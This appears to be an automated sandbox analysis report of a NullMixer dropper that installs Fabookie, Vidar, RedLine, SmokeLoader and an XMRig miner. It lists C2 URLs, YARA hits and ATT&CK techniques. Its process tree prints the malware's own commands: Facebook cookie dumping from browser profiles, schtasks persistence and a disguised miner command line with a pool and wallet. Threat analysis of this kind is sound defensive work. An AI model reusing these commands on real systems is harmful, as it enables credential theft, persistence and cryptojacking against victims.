fabookie | 6430e35390b94f25e609d8dc2edadd8f6b0b30bec768ce894c67028de438ab13

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
24-02-2024 19:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a2932135d6a95b6756ca3cbf02b8a549.exe
Size

3.8MB
MD5

a2932135d6a95b6756ca3cbf02b8a549
SHA1

39175d13b977b9b12fa4f1cbe49abe1c0821b1dc
SHA256

6430e35390b94f25e609d8dc2edadd8f6b0b30bec768ce894c67028de438ab13
SHA512

6e725c150a7d9ccf461be588697969c77f3d193d24aba7417d9439261792b4cd8997a083a22355852a198c3001c1ba9ac02df4112680874bbeeffc64a5633f0d
SSDEEP

98304:x52CheDFNYJ7QibVvhPXIaZ1eCvLUBsKxEK+:xSPYJskRDZ13LUCKc

Malware Config

Extracted

Family

nullmixer

http://marisana.xyz/

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

OLK

zisiarenal.xyz:80

Extracted

Family

smokeloader

Botnet

pub6

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Signatures

Detect Fabookie payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0006000000023201-76.dat	family_fabookie
behavioral2/files/0x0006000000023201-82.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2316-190-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/2316-190-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Nirsoft 8 IoCs

resource	yara_rule
behavioral2/memory/1476-147-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/1240-154-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/4132-205-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/4640-209-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/2540-229-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/3540-231-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/2980-244-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral2/memory/4272-247-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral2/memory/4924-183-0x0000000002F20000-0x0000000002FBD000-memory.dmp	family_vidar
behavioral2/memory/4924-187-0x0000000000400000-0x0000000002CBF000-memory.dmp	family_vidar
behavioral2/memory/4924-227-0x0000000000400000-0x0000000002CBF000-memory.dmp	family_vidar
behavioral2/memory/4924-254-0x0000000002F20000-0x0000000002FBD000-memory.dmp	family_vidar

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/452-301-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/452-302-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/452-304-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/452-309-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/452-310-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/452-319-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

ASPack v2.12-2.42 4 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0006000000023207-32.dat	aspack_v212_v242
behavioral2/files/0x0006000000023203-39.dat	aspack_v212_v242
behavioral2/files/0x0006000000023205-48.dat	aspack_v212_v242
behavioral2/files/0x0006000000023202-44.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	jobiea_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	jobiea_4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	chrome2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3316742141-2240921845-2885234760-1000\Control Panel\International\Geo\Nation	a2932135d6a95b6756ca3cbf02b8a549.exe

Executes dropped EXE 26 IoCs

pid	Process
5100	setup_install.exe
1676	jobiea_1.exe
1592	jobiea_4.exe
4120	jobiea_7.exe
540	jobiea_8.exe
4400	jobiea_2.exe
3864	jobiea_9.exe
4608	jobiea_6.exe
4280	jobiea_5.exe
4924	jobiea_3.exe
4028	jobiea_5.tmp
3676	jobiea_1.exe
4624	chrome2.exe
2436	setup.exe
1476	jfiag3g_gg.exe
1240	jfiag3g_gg.exe
2088	winnetdriv.exe
2316	jobiea_8.exe
4132	jfiag3g_gg.exe
4640	jfiag3g_gg.exe
2540	jfiag3g_gg.exe
3540	jfiag3g_gg.exe
2980	jfiag3g_gg.exe
4272	jfiag3g_gg.exe
4012	services64.exe
4172	sihost64.exe

Loads dropped DLL 7 IoCs

pid	Process
5100	setup_install.exe
5100	setup_install.exe
5100	setup_install.exe
5100	setup_install.exe
5100	setup_install.exe
5100	setup_install.exe
4028	jobiea_5.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1476-147-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/1240-154-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/files/0x0006000000023223-152.dat	upx
behavioral2/memory/4132-205-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/4640-209-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/2540-229-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/3540-231-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/2980-244-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral2/memory/4272-247-0x0000000000400000-0x000000000045B000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
43	iplogger.org
44	iplogger.org
413	raw.githubusercontent.com
414	raw.githubusercontent.com
434	pastebin.com
436	pastebin.com
42	iplogger.org

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ipinfo.io
27	ipinfo.io
34	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 540 set thread context of 2316	540	jobiea_8.exe	117
PID 4012 set thread context of 452	4012	services64.exe	145

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4384	5100	WerFault.exe	90
4384	4400	WerFault.exe	106

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4784	schtasks.exe
2584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4400	jobiea_2.exe
4400	jobiea_2.exe
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found
3372	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4400	jobiea_2.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	4608	jobiea_6.exe
Token: SeDebugPrivilege	2316	jobiea_8.exe
Token: SeShutdownPrivilege	3372	Process not Found
Token: SeCreatePagefilePrivilege	3372	Process not Found
Token: SeDebugPrivilege	4624	chrome2.exe
Token: SeShutdownPrivilege	3372	Process not Found
Token: SeCreatePagefilePrivilege	3372	Process not Found
Token: SeShutdownPrivilege	3372	Process not Found
Token: SeCreatePagefilePrivilege	3372	Process not Found
Token: SeShutdownPrivilege	3372	Process not Found
Token: SeCreatePagefilePrivilege	3372	Process not Found
Token: SeDebugPrivilege	4012	services64.exe
Token: SeShutdownPrivilege	3372	Process not Found
Token: SeCreatePagefilePrivilege	3372	Process not Found
Token: SeLockMemoryPrivilege	452	explorer.exe
Token: SeLockMemoryPrivilege	452	explorer.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3372	Process not Found
3372	Process not Found

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3372	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2452 wrote to memory of 5100	2452	a2932135d6a95b6756ca3cbf02b8a549.exe	90
PID 2452 wrote to memory of 5100	2452	a2932135d6a95b6756ca3cbf02b8a549.exe	90
PID 2452 wrote to memory of 5100	2452	a2932135d6a95b6756ca3cbf02b8a549.exe	90
PID 5100 wrote to memory of 4160	5100	setup_install.exe	94
PID 5100 wrote to memory of 4160	5100	setup_install.exe	94
PID 5100 wrote to memory of 4160	5100	setup_install.exe	94
PID 5100 wrote to memory of 2040	5100	setup_install.exe	93
PID 5100 wrote to memory of 2040	5100	setup_install.exe	93
PID 5100 wrote to memory of 2040	5100	setup_install.exe	93
PID 5100 wrote to memory of 1312	5100	setup_install.exe	95
PID 5100 wrote to memory of 1312	5100	setup_install.exe	95
PID 5100 wrote to memory of 1312	5100	setup_install.exe	95
PID 4160 wrote to memory of 1676	4160	cmd.exe	102
PID 4160 wrote to memory of 1676	4160	cmd.exe	102
PID 4160 wrote to memory of 1676	4160	cmd.exe	102
PID 5100 wrote to memory of 4692	5100	setup_install.exe	101
PID 5100 wrote to memory of 4692	5100	setup_install.exe	101
PID 5100 wrote to memory of 4692	5100	setup_install.exe	101
PID 5100 wrote to memory of 1500	5100	setup_install.exe	100
PID 5100 wrote to memory of 1500	5100	setup_install.exe	100
PID 5100 wrote to memory of 1500	5100	setup_install.exe	100
PID 5100 wrote to memory of 2640	5100	setup_install.exe	96
PID 5100 wrote to memory of 2640	5100	setup_install.exe	96
PID 5100 wrote to memory of 2640	5100	setup_install.exe	96
PID 5100 wrote to memory of 744	5100	setup_install.exe	99
PID 5100 wrote to memory of 744	5100	setup_install.exe	99
PID 5100 wrote to memory of 744	5100	setup_install.exe	99
PID 5100 wrote to memory of 2340	5100	setup_install.exe	98
PID 5100 wrote to memory of 2340	5100	setup_install.exe	98
PID 5100 wrote to memory of 2340	5100	setup_install.exe	98
PID 5100 wrote to memory of 4208	5100	setup_install.exe	97
PID 5100 wrote to memory of 4208	5100	setup_install.exe	97
PID 5100 wrote to memory of 4208	5100	setup_install.exe	97
PID 4692 wrote to memory of 1592	4692	cmd.exe	104
PID 4692 wrote to memory of 1592	4692	cmd.exe	104
PID 4692 wrote to memory of 1592	4692	cmd.exe	104
PID 744 wrote to memory of 4120	744	cmd.exe	103
PID 744 wrote to memory of 4120	744	cmd.exe	103
PID 744 wrote to memory of 4120	744	cmd.exe	103
PID 2340 wrote to memory of 540	2340	cmd.exe	114
PID 2340 wrote to memory of 540	2340	cmd.exe	114
PID 2340 wrote to memory of 540	2340	cmd.exe	114
PID 1500 wrote to memory of 4280	1500	cmd.exe	109
PID 1500 wrote to memory of 4280	1500	cmd.exe	109
PID 1500 wrote to memory of 4280	1500	cmd.exe	109
PID 4208 wrote to memory of 3864	4208	cmd.exe	107
PID 4208 wrote to memory of 3864	4208	cmd.exe	107
PID 4208 wrote to memory of 3864	4208	cmd.exe	107
PID 2040 wrote to memory of 4400	2040	cmd.exe	106
PID 2040 wrote to memory of 4400	2040	cmd.exe	106
PID 2040 wrote to memory of 4400	2040	cmd.exe	106
PID 2640 wrote to memory of 4608	2640	cmd.exe	108
PID 2640 wrote to memory of 4608	2640	cmd.exe	108
PID 1312 wrote to memory of 4924	1312	cmd.exe	113
PID 1312 wrote to memory of 4924	1312	cmd.exe	113
PID 1312 wrote to memory of 4924	1312	cmd.exe	113
PID 4280 wrote to memory of 4028	4280	jobiea_5.exe	111
PID 4280 wrote to memory of 4028	4280	jobiea_5.exe	111
PID 4280 wrote to memory of 4028	4280	jobiea_5.exe	111
PID 1676 wrote to memory of 3676	1676	jobiea_1.exe	115
PID 1676 wrote to memory of 3676	1676	jobiea_1.exe	115
PID 1676 wrote to memory of 3676	1676	jobiea_1.exe	115
PID 540 wrote to memory of 2316	540	jobiea_8.exe	117
PID 540 wrote to memory of 2316	540	jobiea_8.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549.exe
"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2452
- C:\Users\Admin\AppData\Local\Temp\7zS499B4717\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS499B4717\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_2.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_2.exe
      jobiea_2.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:4400
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 372
        5⤵
        Program crash
        
        PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_1.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_1.exe
      jobiea_1.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1676
    - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_1.exe" -a
        5⤵
        Executes dropped EXE
        
        PID:3676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_3.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_3.exe
      jobiea_3.exe
      4⤵
      Executes dropped EXE
      PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_6.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_6.exe
      jobiea_6.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_9.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_9.exe
      jobiea_9.exe
      4⤵
      Executes dropped EXE
      PID:3864
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        
        PID:1240
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:1476
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        
        PID:4640
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:4132
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:2540
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        
        PID:3540
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:2980
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        5⤵
        Executes dropped EXE
        
        PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_8.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_8.exe
      jobiea_8.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:540
    - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_8.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_8.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_7.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_7.exe
      jobiea_7.exe
      4⤵
      Executes dropped EXE
      PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_5.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_5.exe
      jobiea_5.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4280
    - - C:\Users\Admin\AppData\Local\Temp\is-1ESOG.tmp\jobiea_5.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1ESOG.tmp\jobiea_5.tmp" /SL5="$90162,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_5.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c jobiea_4.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_4.exe
      jobiea_4.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:1592
    - - C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        6⤵
        
        PID:2544
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:2584
      - C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:1540
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:4784
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:4172
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:452
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2436
      - C:\Windows\winnetdriv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1708803140 0
        6⤵
        Executes dropped EXE
        
        PID:2088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 560
    3⤵
    - Program crash
    PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5100 -ip 5100
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4400 -ip 4400
1⤵
PID:4376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jobiea_8.exe.log

Filesize
700B

MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_1.exe

Filesize
56KB

MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_2.txt

Filesize
173KB

MD5
de9ac7ed448ac60b2e376edfc1f24253

SHA1
465b102df59d83aa1905e0f50183bb432d319f49

SHA256
3f3d534e98560d0f53b5f6eeb9d0450de897ee467428659de7e72d74eba6735c

SHA512
cb13c421e6d7706b8b9266b736eeb1ad65ed599a8802168d27aab3f2e58dba8d9cf74ede874e886e697347cdb76b34913e569dbb1f8306fb999e99416d22ee7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_3.txt

Filesize
540KB

MD5
01486414c872995f04d7a157c4fb4f50

SHA1
c135c2c5cf4a3abdd5be5c78ef4424601289cdbb

SHA256
838d963c1db2236db9b12a2ebfd44c7e267afcf2dc79ef3ca4f81416f527b122

SHA512
60587beeaf28c95ada7e7b9cb41e148b7aace8d7134de13c42751295fb4024ae05ec5f9772ad1fd4efdaa559136bd079a91c6cfd9efd6880c8bdf61b9b586556

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_4.txt

Filesize
923KB

MD5
13a289feeb15827860a55bbc5e5d498f

SHA1
e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad

SHA256
c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775

SHA512
00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS499B4717\jobiea_5.exe

Filesize
192KB

MD5
c61176577b39daec1d9110947b2f4f76

SHA1
741bc1a038a125883d6802f522a3893bd7bf781f

SHA256
a37d92ad13f673a98b1ee39e26b2b58fbfb0cf168a0bbaee89aad81211851e97

SHA512
